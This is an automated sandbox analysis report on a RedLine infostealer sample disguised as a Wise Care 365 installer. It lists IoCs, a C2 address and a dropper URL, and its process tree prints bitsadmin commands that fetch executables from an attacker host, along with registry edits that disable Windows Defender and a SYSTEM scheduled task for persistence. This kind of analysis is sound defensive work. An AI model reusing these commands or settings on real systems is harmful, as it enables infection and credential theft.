redline | 69a22a0c352f37433ae833dcffed41e1b6d6c5aeefe6167aa4e0be3fe2f07e07

Analysis

max time kernel
148s
max time network
150s
platform
windows7_x64
resource
win7-20220414-en
submitted
09-06-2022 20:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

aad0024d7c30bf6fee7c90d90371ca14.exe
Size

37.0MB
MD5

aad0024d7c30bf6fee7c90d90371ca14
SHA1

a503d2586a3eab062b1696fc1602bae9faaeb221
SHA256

69a22a0c352f37433ae833dcffed41e1b6d6c5aeefe6167aa4e0be3fe2f07e07
SHA512

b8aa5a82c7b3366bc93dee6bfffbb6d5e6fefeff12d8073f8a86993e0a4c985fd88dd33ef87b89384cd094dc34444fc505bfcb3b90cc647bd01088692c3f970a

Score

10^/10

redline main discovery evasion infostealer spyware trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://thddghdd3.com/hfile.bin

Extracted

Family

redline

Botnet

Main

185.250.148.104:23290

Attributes

auth_value
128a196090d81c16477a2ef82c42859f

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 14 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRoutinelyTakingAction = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe

Modifies Windows Defender notification settings 3 TTPs 4 IoCs

evasion trojan

Modify Existing Service

T1031

Modify Registry

T1112

Disabling Security Tools

T1089

Processes:

reg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1"	reg.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/964-264-0x0000000000080000-0x00000000000A0000-memory.dmp	family_redline

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

7 1176 powershell.exe
Downloads MZ/PE file

flow	pid	process
7	1176	powershell.exe

Executes dropped EXE 22 IoCs

Processes:

aad0024d7c30bf6fee7c90d90371ca14.tmp7za.exeWise Care 365 5.9.1.582.exeWise Care 365 5.9.1.582.tmpkernel32.exekernel32.exekernel32.exekernel32.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exeielowutil.execmpbksrvc32.exeumciavi32.exenvdrivesllapi.exe

pid	process
2040	aad0024d7c30bf6fee7c90d90371ca14.tmp
1936	7za.exe
1936	Wise Care 365 5.9.1.582.exe
1904	Wise Care 365 5.9.1.582.tmp
964	kernel32.exe
1696	kernel32.exe
824	kernel32.exe
1492	kernel32.exe
1940	7za.exe
1660	7za.exe
1696	7za.exe
1020	7za.exe
1484	7za.exe
1052	7za.exe
1076	7za.exe
2036	7za.exe
1736	7za.exe
1752	7za.exe
1828	ielowutil.exe
1536	cmpbksrvc32.exe
1556	umciavi32.exe
1824	nvdrivesllapi.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/1556-270-0x0000000000C70000-0x0000000000DC5000-memory.dmp	upx
behavioral1/memory/1556-272-0x0000000000C70000-0x0000000000DC5000-memory.dmp	upx

Loads dropped DLL 26 IoCs

Processes:

aad0024d7c30bf6fee7c90d90371ca14.exeaad0024d7c30bf6fee7c90d90371ca14.tmpcmd.exeWise Care 365 5.9.1.582.execmd.exeWise Care 365 5.9.1.582.tmpcmd.execsc.execmpbksrvc32.exe

pid	process
1464	aad0024d7c30bf6fee7c90d90371ca14.exe
2040	aad0024d7c30bf6fee7c90d90371ca14.tmp
2032	cmd.exe
2032	cmd.exe
2040	aad0024d7c30bf6fee7c90d90371ca14.tmp
1936	Wise Care 365 5.9.1.582.exe
1588	cmd.exe
1904	Wise Care 365 5.9.1.582.tmp
1904	Wise Care 365 5.9.1.582.tmp
1904	Wise Care 365 5.9.1.582.tmp
1904	Wise Care 365 5.9.1.582.tmp
1332	cmd.exe
1332	cmd.exe
1332	cmd.exe
1332	cmd.exe
1332	cmd.exe
1332	cmd.exe
1332	cmd.exe
1332	cmd.exe
1332	cmd.exe
1332	cmd.exe
1332	cmd.exe
964	csc.exe
1536	cmpbksrvc32.exe
964	csc.exe
964	csc.exe

Modifies file permissions 1 TTPs 3 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exe

pid process

1680 icacls.exe
1088 icacls.exe
1192 icacls.exe
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
1680	icacls.exe
1088	icacls.exe
1192	icacls.exe

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
behavioral1/memory/1556-270-0x0000000000C70000-0x0000000000DC5000-memory.dmp	autoit_exe
behavioral1/memory/1556-272-0x0000000000C70000-0x0000000000DC5000-memory.dmp	autoit_exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

ielowutil.exe

description pid process target process

PID 1828 set thread context of 964 1828 ielowutil.exe csc.exe
Drops file in Windows directory 1 IoCs

Processes:

makecab.exe

description ioc process

File created C:\Windows\Logs\CBS\CbsPersist_20220609201254.cab makecab.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1472 schtasks.exe
Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

828 timeout.exe
1352 timeout.exe
Download via BitsAdmin 1 TTPs 2 IoCs
dropper

BITS Jobs
T1197

Processes:

bitsadmin.exebitsadmin.exe

pid process

240 bitsadmin.exe
1824 bitsadmin.exe

description	pid	process	target process
PID 1828 set thread context of 964	1828	ielowutil.exe	csc.exe

description	ioc	process
File created	C:\Windows\Logs\CBS\CbsPersist_20220609201254.cab	makecab.exe

pid	process
1472	schtasks.exe

pid	process
828	timeout.exe
1352	timeout.exe

pid	process
240	bitsadmin.exe
1824	bitsadmin.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

xcopy.exexcopy.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe

Modifies data under HKEY_USERS 3 IoCs

Processes:

kernel32.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	kernel32.exe

Runs ping.exe 1 TTPs 64 IoCs

Remote System Discovery

T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid	process
544	PING.EXE
1888	PING.EXE
1944	PING.EXE
1352	PING.EXE
1792	PING.EXE
1212	PING.EXE
1532	PING.EXE
1744	PING.EXE
1332	PING.EXE
1332	PING.EXE
1064	PING.EXE
1728	PING.EXE
2020	PING.EXE
1980	PING.EXE
1356	PING.EXE
1944	PING.EXE
856	PING.EXE
1052	PING.EXE
1332	PING.EXE
592	PING.EXE
368	PING.EXE
1388	PING.EXE
1020	PING.EXE
1204	PING.EXE
1484	PING.EXE
1712	PING.EXE
1712	PING.EXE
884	PING.EXE
964	PING.EXE
388	PING.EXE
1124	PING.EXE
948	PING.EXE
1888	PING.EXE
1992	PING.EXE
1020	PING.EXE
1980	PING.EXE
1736	PING.EXE
1624	PING.EXE
1592	PING.EXE
388	PING.EXE
1984	PING.EXE
1112	PING.EXE
1076	PING.EXE
1900	PING.EXE
388	PING.EXE
1944	PING.EXE
1764	PING.EXE
1076	PING.EXE
320	PING.EXE
1352	PING.EXE
1452	PING.EXE
764	PING.EXE
1356	PING.EXE
1212	PING.EXE
1308	PING.EXE
1052	PING.EXE
1696	PING.EXE
2036	PING.EXE
1556	PING.EXE
1592	PING.EXE
1076	PING.EXE
320	PING.EXE
928	PING.EXE
536	PING.EXE

Suspicious behavior: EnumeratesProcesses 39 IoCs

Processes:

aad0024d7c30bf6fee7c90d90371ca14.tmppowershell.exeWise Care 365 5.9.1.582.tmpkernel32.exekernel32.execsc.exe

pid	process
2040	aad0024d7c30bf6fee7c90d90371ca14.tmp
2040	aad0024d7c30bf6fee7c90d90371ca14.tmp
1176	powershell.exe
1904	Wise Care 365 5.9.1.582.tmp
1904	Wise Care 365 5.9.1.582.tmp
1904	Wise Care 365 5.9.1.582.tmp
1904	Wise Care 365 5.9.1.582.tmp
1904	Wise Care 365 5.9.1.582.tmp
1904	Wise Care 365 5.9.1.582.tmp
1904	Wise Care 365 5.9.1.582.tmp
1904	Wise Care 365 5.9.1.582.tmp
1904	Wise Care 365 5.9.1.582.tmp
1904	Wise Care 365 5.9.1.582.tmp
1904	Wise Care 365 5.9.1.582.tmp
1904	Wise Care 365 5.9.1.582.tmp
1904	Wise Care 365 5.9.1.582.tmp
1904	Wise Care 365 5.9.1.582.tmp
1904	Wise Care 365 5.9.1.582.tmp
1904	Wise Care 365 5.9.1.582.tmp
1904	Wise Care 365 5.9.1.582.tmp
1904	Wise Care 365 5.9.1.582.tmp
1904	Wise Care 365 5.9.1.582.tmp
1904	Wise Care 365 5.9.1.582.tmp
1904	Wise Care 365 5.9.1.582.tmp
1904	Wise Care 365 5.9.1.582.tmp
1904	Wise Care 365 5.9.1.582.tmp
1904	Wise Care 365 5.9.1.582.tmp
1904	Wise Care 365 5.9.1.582.tmp
1904	Wise Care 365 5.9.1.582.tmp
1904	Wise Care 365 5.9.1.582.tmp
1904	Wise Care 365 5.9.1.582.tmp
1904	Wise Care 365 5.9.1.582.tmp
1904	Wise Care 365 5.9.1.582.tmp
1904	Wise Care 365 5.9.1.582.tmp
964	kernel32.exe
964	kernel32.exe
1696	kernel32.exe
1696	kernel32.exe
964	csc.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

aad0024d7c30bf6fee7c90d90371ca14.tmp

pid process

2040 aad0024d7c30bf6fee7c90d90371ca14.tmp

Suspicious use of AdjustPrivilegeToken 11 IoCs

Processes:

powershell.exekernel32.exekernel32.exeielowutil.execsc.execmpbksrvc32.exe

description	pid	process
Token: SeDebugPrivilege	1176	powershell.exe
Token: SeDebugPrivilege	964	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	964	kernel32.exe
Token: SeIncreaseQuotaPrivilege	964	kernel32.exe
Token: 0	964	kernel32.exe
Token: SeDebugPrivilege	1696	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	1696	kernel32.exe
Token: SeIncreaseQuotaPrivilege	1696	kernel32.exe
Token: SeDebugPrivilege	1828	ielowutil.exe
Token: SeDebugPrivilege	964	csc.exe
Token: SeDebugPrivilege	1536	cmpbksrvc32.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

aad0024d7c30bf6fee7c90d90371ca14.tmp

pid process

2040 aad0024d7c30bf6fee7c90d90371ca14.tmp
Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

Wise Care 365 5.9.1.582.tmp

pid process

1904 Wise Care 365 5.9.1.582.tmp
1904 Wise Care 365 5.9.1.582.tmp
1904 Wise Care 365 5.9.1.582.tmp

pid	process
1904	Wise Care 365 5.9.1.582.tmp
1904	Wise Care 365 5.9.1.582.tmp
1904	Wise Care 365 5.9.1.582.tmp

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

aad0024d7c30bf6fee7c90d90371ca14.exeaad0024d7c30bf6fee7c90d90371ca14.tmpcmd.execmd.exeWScript.execmd.exe

description	pid	process	target process
PID 1464 wrote to memory of 2040	1464	aad0024d7c30bf6fee7c90d90371ca14.exe	aad0024d7c30bf6fee7c90d90371ca14.tmp
PID 1464 wrote to memory of 2040	1464	aad0024d7c30bf6fee7c90d90371ca14.exe	aad0024d7c30bf6fee7c90d90371ca14.tmp
PID 1464 wrote to memory of 2040	1464	aad0024d7c30bf6fee7c90d90371ca14.exe	aad0024d7c30bf6fee7c90d90371ca14.tmp
PID 1464 wrote to memory of 2040	1464	aad0024d7c30bf6fee7c90d90371ca14.exe	aad0024d7c30bf6fee7c90d90371ca14.tmp
PID 1464 wrote to memory of 2040	1464	aad0024d7c30bf6fee7c90d90371ca14.exe	aad0024d7c30bf6fee7c90d90371ca14.tmp
PID 1464 wrote to memory of 2040	1464	aad0024d7c30bf6fee7c90d90371ca14.exe	aad0024d7c30bf6fee7c90d90371ca14.tmp
PID 1464 wrote to memory of 2040	1464	aad0024d7c30bf6fee7c90d90371ca14.exe	aad0024d7c30bf6fee7c90d90371ca14.tmp
PID 2040 wrote to memory of 2000	2040	aad0024d7c30bf6fee7c90d90371ca14.tmp	cmd.exe
PID 2040 wrote to memory of 2000	2040	aad0024d7c30bf6fee7c90d90371ca14.tmp	cmd.exe
PID 2040 wrote to memory of 2000	2040	aad0024d7c30bf6fee7c90d90371ca14.tmp	cmd.exe
PID 2040 wrote to memory of 2000	2040	aad0024d7c30bf6fee7c90d90371ca14.tmp	cmd.exe
PID 2040 wrote to memory of 2032	2040	aad0024d7c30bf6fee7c90d90371ca14.tmp	cmd.exe
PID 2040 wrote to memory of 2032	2040	aad0024d7c30bf6fee7c90d90371ca14.tmp	cmd.exe
PID 2040 wrote to memory of 2032	2040	aad0024d7c30bf6fee7c90d90371ca14.tmp	cmd.exe
PID 2040 wrote to memory of 2032	2040	aad0024d7c30bf6fee7c90d90371ca14.tmp	cmd.exe
PID 2032 wrote to memory of 1176	2032	cmd.exe	powershell.exe
PID 2032 wrote to memory of 1176	2032	cmd.exe	powershell.exe
PID 2032 wrote to memory of 1176	2032	cmd.exe	powershell.exe
PID 2032 wrote to memory of 1176	2032	cmd.exe	powershell.exe
PID 2000 wrote to memory of 240	2000	cmd.exe	bitsadmin.exe
PID 2000 wrote to memory of 240	2000	cmd.exe	bitsadmin.exe
PID 2000 wrote to memory of 240	2000	cmd.exe	bitsadmin.exe
PID 2000 wrote to memory of 240	2000	cmd.exe	bitsadmin.exe
PID 2000 wrote to memory of 1824	2000	cmd.exe	bitsadmin.exe
PID 2000 wrote to memory of 1824	2000	cmd.exe	bitsadmin.exe
PID 2000 wrote to memory of 1824	2000	cmd.exe	bitsadmin.exe
PID 2000 wrote to memory of 1824	2000	cmd.exe	bitsadmin.exe
PID 2032 wrote to memory of 1936	2032	cmd.exe	7za.exe
PID 2032 wrote to memory of 1936	2032	cmd.exe	7za.exe
PID 2032 wrote to memory of 1936	2032	cmd.exe	7za.exe
PID 2032 wrote to memory of 1936	2032	cmd.exe	7za.exe
PID 2032 wrote to memory of 1680	2032	cmd.exe	WScript.exe
PID 2032 wrote to memory of 1680	2032	cmd.exe	WScript.exe
PID 2032 wrote to memory of 1680	2032	cmd.exe	WScript.exe
PID 2032 wrote to memory of 1680	2032	cmd.exe	WScript.exe
PID 2032 wrote to memory of 828	2032	cmd.exe	timeout.exe
PID 2032 wrote to memory of 828	2032	cmd.exe	timeout.exe
PID 2032 wrote to memory of 828	2032	cmd.exe	timeout.exe
PID 2032 wrote to memory of 828	2032	cmd.exe	timeout.exe
PID 1680 wrote to memory of 1588	1680	WScript.exe	cmd.exe
PID 1680 wrote to memory of 1588	1680	WScript.exe	cmd.exe
PID 1680 wrote to memory of 1588	1680	WScript.exe	cmd.exe
PID 1680 wrote to memory of 1588	1680	WScript.exe	cmd.exe
PID 1588 wrote to memory of 756	1588	cmd.exe	reg.exe
PID 1588 wrote to memory of 756	1588	cmd.exe	reg.exe
PID 1588 wrote to memory of 756	1588	cmd.exe	reg.exe
PID 1588 wrote to memory of 756	1588	cmd.exe	reg.exe
PID 1588 wrote to memory of 1472	1588	cmd.exe	reg.exe
PID 1588 wrote to memory of 1472	1588	cmd.exe	reg.exe
PID 1588 wrote to memory of 1472	1588	cmd.exe	reg.exe
PID 1588 wrote to memory of 1472	1588	cmd.exe	reg.exe
PID 1588 wrote to memory of 320	1588	cmd.exe	reg.exe
PID 1588 wrote to memory of 320	1588	cmd.exe	reg.exe
PID 1588 wrote to memory of 320	1588	cmd.exe	reg.exe
PID 1588 wrote to memory of 320	1588	cmd.exe	reg.exe
PID 1588 wrote to memory of 1020	1588	cmd.exe	reg.exe
PID 1588 wrote to memory of 1020	1588	cmd.exe	reg.exe
PID 1588 wrote to memory of 1020	1588	cmd.exe	reg.exe
PID 1588 wrote to memory of 1020	1588	cmd.exe	reg.exe
PID 1588 wrote to memory of 964	1588	cmd.exe	reg.exe
PID 1588 wrote to memory of 964	1588	cmd.exe	reg.exe
PID 1588 wrote to memory of 964	1588	cmd.exe	reg.exe
PID 1588 wrote to memory of 964	1588	cmd.exe	reg.exe
PID 1588 wrote to memory of 544	1588	cmd.exe	reg.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

1928 attrib.exe

pid	process
1928	attrib.exe

C:\Users\Admin\AppData\Local\Temp\aad0024d7c30bf6fee7c90d90371ca14.exe
"C:\Users\Admin\AppData\Local\Temp\aad0024d7c30bf6fee7c90d90371ca14.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1464

C:\Users\Admin\AppData\Local\Temp\is-N6T59.tmp\aad0024d7c30bf6fee7c90d90371ca14.tmp
"C:\Users\Admin\AppData\Local\Temp\is-N6T59.tmp\aad0024d7c30bf6fee7c90d90371ca14.tmp" /SL5="$70022,38098121,731648,C:\Users\Admin\AppData\Local\Temp\aad0024d7c30bf6fee7c90d90371ca14.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2040

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\ProgramData\ConsoleApp\ControlSet000.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:2000

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer Explorers /download /priority FOREGROUND http://thddghdd3.com/Telemetry.xml C:\Users\Admin\AppData\Local\Temp\Telemetry.xml
4⤵
- Download via BitsAdmin
PID:240

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer Explorers /download /priority FOREGROUND http://thddghdd3.com/wlanext32.exe C:\Users\Admin\AppData\Local\Temp\wlanext32.exe
4⤵
- Download via BitsAdmin
PID:1824

C:\Windows\SysWOW64\xcopy.exe
xcopy /y "C:\Users\Admin\AppData\Local\Temp\wlanext32.exe" "C:\ProgramData\Local\Microsoft\Windows\Telemetry\"
4⤵
- Enumerates system info in registry
PID:1944

C:\Windows\SysWOW64\xcopy.exe
xcopy /y "C:\Users\Admin\AppData\Local\Temp\Telemetry.xml" "C:\ProgramData\Local\Microsoft\Windows\Telemetry\"
4⤵
- Enumerates system info in registry
PID:1924

C:\Windows\SysWOW64\attrib.exe
ATTRIB +H C:\ProgramData\Local\Microsoft\Windows\Telemetry\*.*
4⤵
- Views/modifies file attributes
PID:1928

C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /create /RU SYSTEM /TN "Telemetry update-S-1-5-21-3460174932" /XML "C:\ProgramData\Local\Microsoft\Windows\Telemetry\Telemetry.xml"
4⤵
- Creates scheduled task(s)
PID:1472

C:\Windows\SysWOW64\PING.EXE
Ping -n 3 127.0.0.1
4⤵
- Runs ping.exe
PID:544

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1592

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1776

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:2020

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:388

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:616

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:608

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1712

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:884

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:764

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1944

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1888

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1212

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1532

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:856

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:592

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1052

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1744

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:2036

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1992

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1356

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:368

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:960

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1984

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1388

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1332

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1944

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1112

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1212

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1064

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:820

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1076

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1308

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1556

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1900

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:388

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1752

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1976

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1980

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:964

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:2008

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1332

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1944

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:320

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1212

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1064

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1592

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1076

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1764

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1352

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1736

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:388

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1728

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1976

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1124

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1060

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:2008

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1332

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:948

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:320

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:928

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1064

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:2024

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1076

